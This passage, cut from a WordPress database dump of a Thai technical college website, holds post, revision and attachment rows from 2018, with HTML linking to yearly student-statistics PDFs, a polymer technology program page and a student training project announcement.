href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\"> 2554</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\"> 2553</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\"> 2552</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\"> 2551</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\"> 2550</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\"> 2549</a></strong></span></h3>', 'ข้อมูลนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2446-autosave-v1', '', '', '2018-06-27 15:52:05', '2018-06-27 08:52:05', '', 2446, 'http://www.technicrayong.ac.th/2446-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3216, 3, '2018-06-26 10:36:25', '2018-06-26 03:36:25', '<h3><span style=\"color: #0000ff;\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2561</span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2560</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\"> 2559</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\"> 2558</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\"> 2557</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\"> 2556</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\"> 2555</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\"> 2554</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\"> 2553</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\"> 2552</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\"> 2551</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\"> 2550</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\"> 2549</a></strong></span></h3>', 'ข้อมูลนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2446-revision-v1', '', '', '2018-06-26 10:36:25', '2018-06-26 03:36:25', '', 2446, 'http://www.technicrayong.ac.th/2446-revision-v1/', 0, 'revision', '', 0),
(3217, 3, '2018-06-26 10:37:30', '2018-06-26 03:37:30', '<img class=\"aligncenter wp-image-3244 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-02-29.jpg\" alt=\"\" width=\"793\" height=\"553\" />\r\n\r\n<img class=\"aligncenter wp-image-3243 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-14-58-31.jpg\" alt=\"\" width=\"878\" height=\"383\" />\r\n\r\n<img class=\"aligncenter wp-image-3246 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-39-56.jpg\" alt=\"\" width=\"1104\" height=\"593\" />\r\n\r\n<img class=\"aligncenter wp-image-3248 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-44-00.jpg\" alt=\"\" width=\"885\" height=\"500\" /> <img class=\"aligncenter wp-image-3250\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-46-00.jpg\" alt=\"\" width=\"700\" height=\"676\" />\r\n<h2><a href=\"/ข้อมูลนักเรียน-นักศึกษ-2\"><span style=\"color: #0000ff;\">>>ข้อมูลนักเรียน นักศึกษา</span></a></h2>\r\n<h2><a href=\"/รายงานผลสัมฤทธิ์ทางการ\"><span style=\"color: #0000ff;\">>>รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา</span></a></h2>\r\n<h2 class=\"entry-title\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%B4%E0%B8%94%E0%B8%95%E0%B8%B2%E0%B8%A1%E0%B8%9C%E0%B8%A5%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%AA%E0%B8%B2/\"><span style=\"color: #0000ff;\">>>รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน</span></a></h2>\r\n \r\n\r\n ', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2018-10-02 10:57:16', '2018-10-02 03:57:16', '', 0, 'http://www.technicrayong.ac.th/?page_id=3217', 0, 'page', '', 0),
(3218, 3, '2018-06-26 10:37:30', '2018-06-26 03:37:30', '', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3217-revision-v1', '', '', '2018-06-26 10:37:30', '2018-06-26 03:37:30', '', 3217, 'http://www.technicrayong.ac.th/3217-revision-v1/', 0, 'revision', '', 0),
(3220, 3, '2018-06-26 10:40:06', '2018-06-26 03:40:06', '<h3><a href=\"http://www.technicrayong.ac.th/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-4/\"><strong>ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 2 ปีการศึกษา 2561</strong></a></h3>\r\n<h3><strong><a href=\"/ข้อมูลนักเรียน-นักศึกษา\">ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561</a></strong></h3>\r\n<h3></h3>', 'ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2561', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-3', '', '', '2018-11-09 12:33:28', '2018-11-09 05:33:28', '', 0, 'http://www.technicrayong.ac.th/?page_id=3220', 0, 'page', '', 0),
(3221, 3, '2018-06-26 10:40:06', '2018-06-26 03:40:06', '<h3><strong><a href=\"http://www.technicrayong.ac.th/ข้อมูลนักเรียน-นักศึกษา\">ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561</a></strong></h3>', 'ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3220-revision-v1', '', '', '2018-06-26 10:40:06', '2018-06-26 03:40:06', '', 3220, 'http://www.technicrayong.ac.th/3220-revision-v1/', 0, 'revision', '', 0),
(3222, 3, '2018-11-09 12:33:23', '2018-11-09 05:33:23', '<h3><strong>ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 2 ปีการศึกษา 2561</strong></h3>\n<h3><strong><a href=\"/ข้อมูลนักเรียน-นักศึกษา\">ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561</a></strong></h3>\n<h3></h3>', 'ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3220-autosave-v1', '', '', '2018-11-09 12:33:23', '2018-11-09 05:33:23', '', 3220, 'http://www.technicrayong.ac.th/3220-autosave-v1/', 0, 'revision', '', 0),
(3223, 3, '2018-06-26 10:40:45', '2018-06-26 03:40:45', '<h3><a href=\"http://www.technicrayong.ac.th/ข้อมูลนักเรียน-นักศึกษ-3\"><span style=\"color: #0000ff;\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2561</span></a></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2560</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\"> 2559</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\"> 2558</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\"> 2557</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\"> 2556</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\"> 2555</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\"> 2554</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\"> 2553</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\"> 2552</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\"> 2551</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\"> 2550</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\"> 2549</a></strong></span></h3>', 'ข้อมูลนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2446-revision-v1', '', '', '2018-06-26 10:40:45', '2018-06-26 03:40:45', '', 2446, 'http://www.technicrayong.ac.th/2446-revision-v1/', 0, 'revision', '', 0),
(3224, 3, '2018-06-27 09:36:36', '2018-06-27 02:36:36', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.608923489483843.1073742147.100010985913485&type=3\"><img class=\"aligncenter wp-image-3225\" src=\"/wp-content/uploads/2018/06/27-6-2561-9-34-46.jpg\" alt=\"\" width=\"500\" height=\"830\" /></a>', 'โครงการอบรมเชิงปฏิบัติการเสริมสร้างชีวิต พัฒนาความคิดแบบบุคลาธิษฐาน ประจำปีงบประมาณ ๒๕๖๑ เพื่อปรับเปลี่ยนพฤติกรรม สร้างภูมิคุ้มกันทางจิตใจให้กับนักเรียน นักศึกษากลุ่มเสี่ยงให้มากขึ้น และให้ผู้เรียนตระหนักในบทบาท หน้าที่ความเป็นคนไทย ในฐานะฝีมือชนคนสร้างชาติ วันที่ ๒๖ – ๒๙ มิถุนายน ๒๕๖๑', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%87%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4-2', '', '', '2018-06-27 09:39:33', '2018-06-27 02:39:33', '', 0, 'http://www.technicrayong.ac.th/?p=3224', 376, 'post', '', 0),
(3225, 3, '2018-06-27 09:35:37', '2018-06-27 02:35:37', '', '27-6-2561 9-34-46', '', 'inherit', 'closed', 'closed', '', '27-6-2561-9-34-46', '', '', '2018-06-27 09:35:37', '2018-06-27 02:35:37', '', 3224, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-9-34-46.jpg', 0, 'attachment', 'image/jpeg', 0),
(3226, 3, '2018-06-27 09:36:36', '2018-06-27 02:36:36', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.608923489483843.1073742147.100010985913485&type=3\"><img class=\"aligncenter wp-image-3225\" src=\"/wp-content/uploads/2018/06/27-6-2561-9-34-46.jpg\" alt=\"\" width=\"500\" height=\"830\" /></a>', 'โครงการอบรมเชิงปฏิบัติการเสริมสร้างชีวิต พัฒนาความคิดแบบบุคลาธิษฐาน ประจำปีงบประมาณ ๒๕๖๑ เพื่อปรับเปลี่ยนพฤติกรรม สร้างภูมิคุ้มกันทางจิตใจให้กับนักเรียน นักศึกษากลุ่มเสี่ยงให้มากขึ้น และให้ผู้เรียนตระหนักในบทบาท หน้าที่ความเป็นคนไทย ในฐานะฝีมือชนคนสร้างชาติ วันที่ ๒๖ – ๒๙ มิถุนายน ๒๕๖๑', '', 'inherit', 'closed', 'closed', '', '3224-revision-v1', '', '', '2018-06-27 09:36:36', '2018-06-27 02:36:36', '', 3224, 'http://www.technicrayong.ac.th/3224-revision-v1/', 0, 'revision', '', 0),
(3227, 3, '2018-06-27 09:39:41', '2018-06-27 02:39:41', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.608923489483843.1073742147.100010985913485&type=3\"><img class=\"aligncenter wp-image-3225\" src=\"/wp-content/uploads/2018/06/27-6-2561-9-34-46.jpg\" alt=\"\" width=\"500\" height=\"830\" /></a>', 'โครงการอบรมเชิงปฏิบัติการเสริมสร้างชีวิต พัฒนาความคิดแบบบุคลาธิษฐาน ประจำปีงบประมาณ ๒๕๖๑ เพื่อปรับเปลี่ยนพฤติกรรม สร้างภูมิคุ้มกันทางจิตใจให้กับนักเรียน นักศึกษากลุ่มเสี่ยงให้มากขึ้น และให้ผู้เรียนตระหนักในบทบาท หน้าที่ความเป็นคนไทย ในฐานะฝีมือชนคนสร้างชาติ วันที่ ๒๖ – ๒๙ มิถุนายน ๒๕๖๑', '', 'inherit', 'closed', 'closed', '', '3224-autosave-v1', '', '', '2018-06-27 09:39:41', '2018-06-27 02:39:41', '', 3224, 'http://www.technicrayong.ac.th/3224-autosave-v1/', 0, 'revision', '', 0),
(3228, 3, '2018-06-27 09:39:07', '2018-06-27 02:39:07', '', '36300534_608923609483831_6523644088095342592_o', '', 'inherit', 'closed', 'closed', '', '36300534_608923609483831_6523644088095342592_o', '', '', '2018-06-27 09:39:07', '2018-06-27 02:39:07', '', 3224, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/36300534_608923609483831_6523644088095342592_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3229, 3, '2018-06-27 10:16:18', '2018-06-27 03:16:18', '<img class=\"aligncenter size-full wp-image-3232\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-15-09.jpg\" alt=\"\" width=\"194\" height=\"245\" /> <img class=\"aligncenter wp-image-3230\" src=\"/wp-content/uploads/2018/06/27-6-2561-9-47-06-300x80.jpg\" alt=\"\" width=\"380\" height=\"101\" /> <img class=\"aligncenter wp-image-3231 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-12-06.jpg\" alt=\"\" width=\"956\" height=\"345\" />', 'เทคโนโลยียางและพอลิเมอร์', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5%e0%b8%a2%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9e%e0%b8%ad%e0%b8%a5%e0%b8%b4%e0%b9%80%e0%b8%a1%e0%b8%ad', '', '', '2018-06-27 10:16:18', '2018-06-27 03:16:18', '', 0, 'http://www.technicrayong.ac.th/?page_id=3229', 0, 'page', '', 0),
(3230, 3, '2018-06-27 10:13:25', '2018-06-27 03:13:25', '', '27-6-2561 9-47-06', '', 'inherit', 'closed', 'closed', '', '27-6-2561-9-47-06', '', '', '2018-06-27 10:13:25', '2018-06-27 03:13:25', '', 3229, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-9-47-06.jpg', 0, 'attachment', 'image/jpeg', 0),
(3231, 3, '2018-06-27 10:13:29', '2018-06-27 03:13:29', '', '27-6-2561 10-12-06', '', 'inherit', 'closed', 'closed', '', '27-6-2561-10-12-06', '', '', '2018-06-27 10:13:29', '2018-06-27 03:13:29', '', 3229, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-10-12-06.jpg', 0, 'attachment', 'image/jpeg', 0),
(3232, 3, '2018-06-27 10:13:33', '2018-06-27 03:13:33', '', '27-6-2561 10-15-09', '', 'inherit', 'closed', 'closed', '', '27-6-2561-10-15-09', '', '', '2018-06-27 10:13:33', '2018-06-27 03:13:33', '', 3229, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/27-6-2561-10-15-09.jpg', 0, 'attachment', 'image/jpeg', 0),
